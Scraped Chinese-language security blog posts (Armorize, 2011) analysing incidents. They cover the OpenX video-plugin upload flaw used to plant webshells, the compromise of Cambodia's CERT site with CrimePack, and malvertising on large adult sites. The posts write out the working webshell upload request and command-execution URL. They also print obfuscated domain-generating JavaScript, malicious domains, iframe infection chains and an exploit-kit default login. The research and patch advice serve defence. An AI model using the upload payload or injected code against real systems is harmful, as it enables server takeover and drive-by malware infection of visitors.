經過我們分析,WebShell應該是透過 OpenX 的一個 Video Plugin 的漏洞上傳的 ( <a href="http://www.openx.org/docs/2.8/userguide/video%20ads%20player%20configuration">OpenX 網站</a>上面的<a href="https://developer.openx.org/wiki/download/attachments/16155845/openXVideoAds.zip">連結</a> )<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-HmSlPpw5Grg/ThMexlURqUI/AAAAAAAACUY/LO3U6L2SCO4/s1600/openx_malvertising_personal_shield_pro_openx_website.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://1.bp.blogspot.com/-HmSlPpw5Grg/ThMexlURqUI/AAAAAAAACUY/LO3U6L2SCO4/s1600/openx_malvertising_personal_shield_pro_openx_website.png" /></a></div>此壓縮檔包含了OpenX Video Plugin版本1.1,此版本包含了<a href="http://sourceforge.net/projects/openflashchart/files/open-flash-chart/">Open Flash Chart</a>,該套件自從2009年後就沒有被更新,並且存在一個已知的漏洞 (未限制上傳檔案內容,<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4140">CVE-2009-4140</a>)<br />
<br />
如下圖所示,在下載並且安裝從 Openx 上的這個插件後,可以看到此套件的版本為1.1:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-_QykG35lOOk/ThO7XEG9jhI/AAAAAAAACVA/2PAN3d8Jx7M/s1600/2.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://3.bp.blogspot.com/-_QykG35lOOk/ThO7XEG9jhI/AAAAAAAACVA/2PAN3d8Jx7M/s1600/2.PNG" /></a></div><br />
1.1版本已經屬於舊的版本,目前該Video插件最新版的是1.8.7,如下所示:<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xk83JlNaJso/ThO73Y_JgvI/AAAAAAAACVI/Ip2a3L3vYjw/s1600/1.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://4.bp.blogspot.com/-xk83JlNaJso/ThO73Y_JgvI/AAAAAAAACVI/Ip2a3L3vYjw/s1600/1.PNG" /></a></div><br />
<a name="attack"><b>[4. 攻擊方式]</b></a><br />
<br />
1. 攻擊者首先測試 ofc_upload_image.php 檔案是否存在:<br />
http://victim.com/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php<br />
<br />
2. 如果存在,攻擊者則透過下面的要求建立一個簡單的webshell:<br />
http://victim.com/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?php @system($_GET[cmd]);?><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-mD86KY1MvGs/ThMxarOdi_I/AAAAAAAACUg/ZSKJNUY7fAQ/s1600/openx_malvertising_personal_shield_pro_openx_website3.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://1.bp.blogspot.com/-mD86KY1MvGs/ThMxarOdi_I/AAAAAAAACUg/ZSKJNUY7fAQ/s1600/openx_malvertising_personal_shield_pro_openx_website3.PNG" /></a></div><br />
3. 攻擊者接下來確認shell是否有被成功的上傳:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-y3zjcH_iHTY/ThMyyUHypmI/AAAAAAAACUo/NLY6xeIDaaA/s1600/openx_hacked_webshell_malvertising4.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://1.bp.blogspot.com/-y3zjcH_iHTY/ThMyyUHypmI/AAAAAAAACUo/NLY6xeIDaaA/s1600/openx_hacked_webshell_malvertising4.PNG" /></a></div><br />
4. 一旦上傳成功,攻擊者則可以透過以下URL執行任何系統指令:<br />
http://victim.com/www/admin/plugins/videoReport/lib/tmp-upload-images/shell.php?cmd=ipconfig<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-rdz8DuZuGSk/ThMyyrEorDI/AAAAAAAACUw/21wfsVoc548/s1600/openx_hacked_webshell_malvertising5.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://4.bp.blogspot.com/-rdz8DuZuGSk/ThMyyrEorDI/AAAAAAAACUw/21wfsVoc548/s1600/openx_hacked_webshell_malvertising5.PNG" /></a></div><br />
5. 使用上傳好的shell來將惡意的javascript插入 OpenX 的php檔案。以本次事件來舉例:<br />
<br />
<pre class="brush: html; auto-links: false">http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/
</pre><br />
<a name="patch"><b>[5. 如何修補網站]</b></a><br />
<br />
網站管理者需要點選 OpenX 管理介面的 "插件" 分頁去確認他們所使用的 openXVideoAds 版本 (如上一節所示)。只要是版本比1.8.7還舊的,可以透過以下簡單的步驟修正這個漏洞:<br />
<br />
1. 進入 ofc2 目錄,一般常見路徑如下:<br />
/admin/banner/www/admin/plugins/videoReport/lib/ofc2<br />
<br />
2. 在該目錄下,找到 ofc_upload_image.php 檔案之後清空此檔案的內容:<br />
/admin/banner/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php<br />
<br />
此即 1.8.7 修正此漏洞的方式。<br />
<br />
<a name="exploitpack"><b>[6. Exploit Pack]</b></a><br />
<br />
本次事件觀察到的Exploit Pack為 g01pack exploit pack:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-zLANvMR6G6Y/ThNYUaQKZcI/AAAAAAAACU4/6qcBb-U9h5I/s1600/g01pack_malvertising.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://1.bp.blogspot.com/-zLANvMR6G6Y/ThNYUaQKZcI/AAAAAAAACU4/6qcBb-U9h5I/s1600/g01pack_malvertising.png" /></a></div><br />
<a name="randomization"><b>[7. 變動的惡意網域]</b></a><br />
<br />
接下來我們來看看在這波攻擊中,攻擊者所使用的網域:<br />
<br />
blogtxcl.dyndns-blog.com<br />
blogtvaj.dyndns-blog.com<br />
blogkmra.dyndns-blog.com<br />
blogrsxg.dyndns-blog.com<br />
blogopud.dyndns-blog.com<br />
bloghinw.dyndns-blog.com<br />
blogcdir.dyndns-blog.com<br />
blogwwbk.dyndns-blog.com<br />
blogrrwf.dyndns-blog.com<br />
blogootc.dyndns-blog.com<br />
<br />
以及:<br />
<br />
officekhmv.dyndns-office.com<br />
officetnsb.dyndns-office.com<br />
officetlqz.dyndns-office.com<br />
officevfkt.dyndns-office.com<br />
officeluzi.dyndns-office.com<br />
officeeinw.dyndns-office.com<br />
officejmra.dyndns-office.com<br />
officeklqz.dyndns-office.com<br />
officecdir.dyndns-office.com<br />
officexcgp.dyndns-office.com<br />
officeccgp.dyndns-office.com<br />
<br />
顯然,這些網域有著相同的格式:_X_random.dyndns-X.com。在第一個例子中,X=blog,而在第二個例子中,X=office。事實上,這就是變動網域如何產生的方式。讓我們來看看在OpenX 的 ajs.php 中插入的惡意程式碼片段:<br />
<pre class="brush: html; auto-links: false">http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/
</pre>以下為插入的一部份程式碼:<br />
<pre class="brush: js; auto-links: false">function T(harlots, ralphed) {
soberer = harlots;
var r = String("abcdefghi5zI9".substr(0, 9) + "jklmnopqrA2B".substr(0, 9) + "stuvwxyz");
var limpsey = new String("charARvGp".substr(0, 5) + "t");
var doglegs = "length";
footies = new Date();
var leisure = Math.floor(footies.getUTCHours());
var wyverns = footies.getUTCDate();
var dusters = footies.getUTCMonth();
var evinces = footies.getUTCFullYear();
var anchors = (leisure % r[doglegs]);
var a = (leisure + wyverns) % r[doglegs];
var romanos = (leisure + wyverns + dusters) % r[doglegs];
var sorcery = (leisure + wyverns + dusters + evinces) % r[doglegs];
soberer += r[limpsey](anchors);
soberer += r[limpsey](a);
soberer += r[limpsey](romanos);
soberer += r[limpsey](sorcery);
return soberer + ralphed;
}
</pre>而這邊說明了 "T" 這個函式是如何被呼叫的:<br />
<pre class="brush: js; auto-links: false">var soberer = T(new String(\"blou0s\".substr(0,3)+\"glqSm\".substr(0,1)), new String(\".dyndns-\"+\"blog.com\"));
</pre>String(\"blou0s\".substr(0,3)+\"glqSm\".substr(0,1)) 可以解為:<br />
<b>"blog"</b><br />
而 String(\".dyndns-\"+\"blog.com\") 可以解為:<br />
<b>"dyndns-blog.com"</b><br />
<br />
透過上述的演算法產生了變動的惡意網域 (_X_random.dyndns-X.com)。此演算法會隨著不同的年、月、日、時,產生不同的惡意網域。<br />
<br />
<a name="php_filename"><b>[8. 亂數產生的PHP檔名?]</b></a><br />
<br />
目前我們已經了解了惡意程式碼所產生的網域名部份,現在讓我們來看看透過它產生出來的<b>整個URL</b>。舉例如下:<br />
<pre class="brush: html; auto-links: false">http://nwetdsou.dyndns-web.com/images/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=131263&topic_id=de_at&
</pre>讓我們來看看<b>檔名</b>部份:aeea8469e09d31020332ac926f183eaa.php。看起來是亂數產生的,是嗎? 其實並不是,如果透過<a href="http://www.google.com.tw/search?sourceid=chrome&ie=UTF-8&q=aeea8469e09d31020332ac926f183eaa.php">Google搜尋它</a>,可以看到我們之前的報告:<a href="http://armorize-cht.blogspot.com/2011/05/clicksor_16.html">超過一半以上的惡意廣告來自Clicksor</a>。(該篇文章中所提到的惡意網頁目前已失效,僅剩結果可供參考)<br />
<br />
所以看似亂數的 "aeea8469e09d31020332ac926f183eaa.php" 在過去<b>確實出現過</b>。<br />
<br />
此外,在我們與GMO-HS 合作的惡意程式研究中心中,此檔案 "aeea8469e09d31020332ac926f183eaa.php" 在最近也出現多次,部份與此次事件有關,部份則是屬於其他事件。<b>一個有趣的狀況是:儘管網域名稱是會變動的,但是檔名的部份卻是固定的,只是讓人看起來以為是亂數產生。</b><br />
舉例:<br />
<pre class="brush: html; auto-links: false">http://nwetdsou.dyndns-web.com/images/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=131263&topic_id=de_at&
http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&
http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&
http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&
http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&
http://blog.equine-webdesign.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2328756&forum_id=2010&
http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&
http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&
</pre><br />
<a name="dyndns"><b>[9. "dyndns" 團隊]</b></a><br />
<br />
因此,這些看似亂數的檔名 "aeea8469e09d31020332ac926f183eaa.php" 並不是真的亂數產生,實際上,這是一個普遍被"dyndns"團隊拿來使用的檔名,而且也在我們五月份的報告(<a href="http://armorize-cht.blogspot.com/2011/05/clicksor_16.html">超過一半以上的惡意廣告來自Clicksor</a>)中出現,除此之外,在其他事件中也有看到此種檔名的蹤跡。<br />
<br />
<b><a name="#list">[10. 被感染的網站列表]</a></b><br />
以下為在此次事件中受影響的網站:<br />
<br />
theastrologer.com<br />
bancadellecase.com<br />
thrillldrillls.com<br />
luckymoving.com<br />
fastodds.com<br />
mediabooks.com<br />
dfonline.jp<br />
dailynews.co.za<br />
perefoorum.ee<br />
sasites.co.za<br />
abmotor.pt<br />
medical-tribune.co.jp<br />
diamondcard.it<br />
adrenal-fatigue.de<br />
allergien-behandeln.de<br />
rhr.ru<br />
kuku.ee<br />
handwerkermarkt.de<br />
<br />
<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-2174327567201076905?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=SG50vGU7c5w:k6Wi0wt1Xk8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=SG50vGU7c5w:k6Wi0wt1Xk8:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=SG50vGU7c5w:k6Wi0wt1Xk8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=SG50vGU7c5w:k6Wi0wt1Xk8:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/SG50vGU7c5w" height="1" width="1"/>Colanoreply@blogger.com1http://armorize-cht.blogspot.com/2011/07/openxorg-dyndns-personal-shield-pro.htmltag:blogger.com,1999:blog-1441759431140700676.post-16100564493610109032011-07-12T01:20:00.001+08:002011-07-13T23:55:35.022+08:002011-07-13T23:55:35.022+08:00柬埔寨電腦網路危機處理中心(www.camcert.gov.kh)散佈惡意程式(作者: GlobalSign 團隊, Armorize成員:Wayne Huang, Chris Hsiao, Sun Huang, NightCola Lin, Fyodor Yarochkin)<br />
<br />
從今年年初開始,GlobalSign就和阿碼共同建立了一個專門掃描惡意網站的平臺。<br />
<br />
在七月一日(星期五)時,我們發現到部份被感染的網站被插入了一個iframe指向 www.camcert.gov.kh,一個位於柬埔寨的<b>Cert單位</b>。<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-GhECbqvc6YU/ThAKLaLw3xI/AAAAAAAACTw/fEsvdhuFqNE/s1600/cambodia_cert_hacked_cropped.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://4.bp.blogspot.com/-GhECbqvc6YU/ThAKLaLw3xI/AAAAAAAACTw/fEsvdhuFqNE/s1600/cambodia_cert_hacked_cropped.png" /></a></div><iframe width="750" height = "468" src="http://www.youtube.com/embed/UfY0pCZXF8o" frameborder="0" allowfullscreen></iframe><br />
我們立即著手分析CamCERT的網站,證實了他確實被入侵並且已被植入了CramePack這一個Exploit Pack,會針對 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3867">CVE-2009-3867</a>, <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659">CVE-2007-5659</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927">CVE-2009-0927</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992">CVE-2008-2992</a>, and <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3269">CVE-2009-3269</a> 這些弱點來產生 Drive-by Download的行為,讓瀏覽者自動下載惡意程式並且執行。<br />
<span class="fullpost"><br />
被感染的網站包含了一段被插入的javascript,會動態產生一個iframe指向www.camcert.gov.kh:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uaE3JHiVtKA/ThAKLVSCCHI/AAAAAAAACTo/mPIC40Rpr6o/s1600/cambodia_cert_hacked2.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://2.bp.blogspot.com/-uaE3JHiVtKA/ThAKLVSCCHI/AAAAAAAACTo/mPIC40Rpr6o/s1600/cambodia_cert_hacked2.png" /></a></div>產生的iframe如下:<br />
<pre class="brush: html; auto-links: false">http://www.camcert.gov.kh/userfiles/.cache/nolock/index.php
</pre>Crimepack的植入點在 http://www.camcert.gov.kh/userfiles/.cache 裡面的 "nolock" 目錄:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-0F2fwMXK37M/ThAMC3U8XDI/AAAAAAAACT4/rC8Lee1wBWg/s1600/cambodia_cert_hacked3.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://2.bp.blogspot.com/-0F2fwMXK37M/ThAMC3U8XDI/AAAAAAAACT4/rC8Lee1wBWg/s1600/cambodia_cert_hacked3.png" /></a></div>透過瀏覽器連向http://www.camcert.gov.kh/userfiles/.cache/nolock/control.php,會出現Http Basic authentication的認證,在此時輸入Crimepack的預設帳號:"crimepack",及空白密碼後,即可看到Crimepack的UI介面,如同此篇報導一開始秀出的畫面。<br />
<br />
我們立刻通知CamCERT,在幾個小時過後我們收到了一封E-mail:他們已經在處理這個事件了。<br />
<br />
<a href="https://www.globalsign.com/blog/2011/07/malware-monitoring-and-detection-%E2%80%93-the-latest-hack-is-the-cambodia-government-cert/">GlobalSign針對此次事件的報導</a><br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-1610056449361010903?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=zsSnl2ScWJ8:6mXdxPG3TyQ:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=zsSnl2ScWJ8:6mXdxPG3TyQ:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=zsSnl2ScWJ8:6mXdxPG3TyQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=zsSnl2ScWJ8:6mXdxPG3TyQ:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/zsSnl2ScWJ8" height="1" width="1"/>Colanoreply@blogger.com0http://armorize-cht.blogspot.com/2011/07/wwwcamcertgovkh.htmltag:blogger.com,1999:blog-1441759431140700676.post-8238727458478713262011-05-31T14:20:00.000+08:002011-05-31T14:20:23.777+08:002011-05-31T14:20:23.777+08:00成人網站擁有大量流量... 及惡意廣告(作者:Chris Hsiao, NightCola Lin, Wayne Huang)<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/--ZudNTBsNHg/TdrxVDpLEiI/AAAAAAAACQE/SK1OdqVb_AI/s1600/pron_hub_web_malware_drive_by_download.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/--ZudNTBsNHg/TdrxVDpLEiI/AAAAAAAACQE/SK1OdqVb_AI/s1600/pron_hub_web_malware_drive_by_download.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610061629900919330" /></a><br />
如果你在下班時間走進我們的辦公室,發現我們很多人都圍繞在Chris.Hsiao的位置附近,而銀幕上顯示的是大量的成人網站及圖片......相信我們正在工作。<br />
<br />
在阿碼科技,我們積極的掃描大量的網站以確認其是否有惡意行為,當然我們沒有辦法涵蓋所有的網站,因此我們試著至少能涵蓋那些比較大的網站。當我們建立好這一個平臺之後,我們隨即發現到一個狀況:在其中有好一大部份的比率竟然是那些成人網站(具有相當大的流量)!<br />
<br />
隨著我們開始掃描這些網站,即刻發現到了一個現象:除了大量流量以外,這些網站通常也辦隨著惡意廣告(malvertising)。<br />
<br />
惡意廣告透過網站(在廣告產業中,我們稱之為publisher)提供給瀏覽者。一些惡意廣告會隨著drive-by download 的行為一起出現,在瀏覽者看到的同時,不需要做任何動作、也不需要去按任何確認鍵,就有被感染的風險。<br />
<br />
以下是我們這次的報導:一個惡意廣告商(celeb-escorts.com)是如何讓兩個非常大的成人網站去顯示他所提供的惡意廣告。<br />
<br />
第一個網站是:pornhub.com,<a href="http://www.alexa.com/search?q=pornhub.com&r=home_home&p=bigtop">Alexa排名第62名</a>,每一天有<b><a href="http://siteanalytics.compete.com/pornhub.com/">23,873,546</a></b>個瀏覽者。<br />
<br />
相當大的流量!惡意廣告透過廣告仲介(網站與廣告商間的中介,一般稱之為AD network / exchange):etology.com 顯示在pornhub.com上。這幅惡意廣告是由celeb-escorts.com這個廣告商(Advertiser)提供給etology的,而celeb-escorts.com這個網域在今年(2011)五月11日才註冊。因此,種種跡象顯示celeb-escorts.com非常可能是由惡意團體所註冊的,用途是將其惡意廣告散播到整個廣告網路中。下圖是本次事件中相關的網站:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-lLzBSRIQ8Hw/TdyR5EVZTKI/AAAAAAAACQM/8urzV1shtgc/s1600/pornhub_malvertising_drive_by_download.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/-lLzBSRIQ8Hw/TdyR5EVZTKI/AAAAAAAACQM/8urzV1shtgc/s1600/pornhub_malvertising_drive_by_download.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610519645398846626" /></a><br />
下圖則是事件的主角:惡意廣告本身,透過celeb-escorts所顯示的。在顯示這幅廣告的同時,也會同時產生iframe將瀏覽者導向tun4atta.in,整個惡意行為的起始點。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-PkzyqcJgpWo/Tdzfe7NsPtI/AAAAAAAACQs/hkjiG4jtkr8/s1600/malvertisement_celeb_escorts.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/-PkzyqcJgpWo/Tdzfe7NsPtI/AAAAAAAACQs/hkjiG4jtkr8/s1600/malvertisement_celeb_escorts.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610604958180982482" /></a><span class="fullpost"><br />
整個感染鏈及細節如下:<br />
<br />
1. http://www.pornhub.com/<br />
<br />
2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage<br />
<br />
3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/<br />
<br />
4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29<br />
<br />
5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html<br />
<br />
6. http://pages.etology.com/imp2/93114.php<br />
<pre class="brush: html; auto-links: false"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>
</pre><br />
7. http://celeb-escorts.com/banners/300x250.jpg<br />
<pre class="brush: html; auto-links: false"><a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg' border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>
</pre><br />
8. http://tun4atta.in/bcounter.php?u=adult<br />
<pre class="brush: html; auto-links: false"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>
</pre><br />
9. http://iban6duo.in/ts/in.cgi?adult<br />
<pre class="brush: html; auto-links: false"><html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>
</pre><br />
10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb<br />
(此即為最後下載並執行的惡意軟體)<br />
<br />
這次攻擊者所使用的exploit pack是Black Hole。從我們一開始在五月13日發現後,最後下載並安裝的惡意軟體一直隨著時間在改變。<br />
<br />
一開始發現的惡意軟體是 <a href="http://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot">SpyEye</a>,他是一個類似 Zeus 的犯罪軟體(crimeware)。一開始VirusTotal上的偵測率僅有 <a href="http://www.virustotal.com/file-scan/report.html?id=3b5dc4738a1afeaab369c706c34d54aeaf23bf39a50a8b456b92ab0ad3feb2b4-1305532242">3/42</a>,至於目前已經有 <a href="http://www.virustotal.com/file-scan/report.html?id=3b5dc4738a1afeaab369c706c34d54aeaf23bf39a50a8b456b92ab0ad3feb2b4-1305532242">21/42</a>。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-7PmVbGYijeI/TdyR5VpZWZI/AAAAAAAACQU/WsCrNrHyjgU/s1600/pornhub_malvertising_drive_by_download_virus_total.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-7PmVbGYijeI/TdyR5VpZWZI/AAAAAAAACQU/WsCrNrHyjgU/s1600/pornhub_malvertising_drive_by_download_virus_total.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610519650046138770" /></a><br />
目前自動下載並安裝的惡意軟體仍然是 SpyEye,但是有被重新加殼過,因此在VirusTotal上的偵測率僅有 <a href="http://www.virustotal.com/file-scan/report.html?id=23d29b22d01edc3bc6c7d388ed82c9581afbd8a80c674026e40004197ae514e4-1306299679">5/42</a>。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-LI-hWlUOlzU/TdyR5orv2mI/AAAAAAAACQc/FrlxjpaALTY/s1600/pornhub_malvertising_drive_by_download_virus_total2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/-LI-hWlUOlzU/TdyR5orv2mI/AAAAAAAACQc/FrlxjpaALTY/s1600/pornhub_malvertising_drive_by_download_virus_total2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610519655156275810" /></a><br />
第二個網站是:tube8.com,<a href="http://www.alexa.com/search?q=tube8.com&r=site_screener&p=bigtop">Alexa排名第113名</a>,每一天有<b><a href="http://siteanalytics.compete.com/tube8.com/">10,885,350</a></b>個瀏覽者。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-U8koYIUnE4k/TdzffHligFI/AAAAAAAACQ0/o9_hJJjKLd0/s1600/tube.com.1.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-U8koYIUnE4k/TdzffHligFI/AAAAAAAACQ0/o9_hJJjKLd0/s1600/tube.com.1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610604961502232658" /></a><br />
一開始載入的廣告代理商(Traffic Junky (trafficjunky.net))、廣告仲介商(etology.com)都是一樣的。我們實際上也在tube8.com上看到了相同的一幅惡意廣告。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-QQvrOZqkFAI/Tdzffa-pIQI/AAAAAAAACQ8/u98-ECAmUH0/s1600/tube8.com.2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-QQvrOZqkFAI/Tdzffa-pIQI/AAAAAAAACQ8/u98-ECAmUH0/s1600/tube8.com.2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610604966707798274" /></a><br />
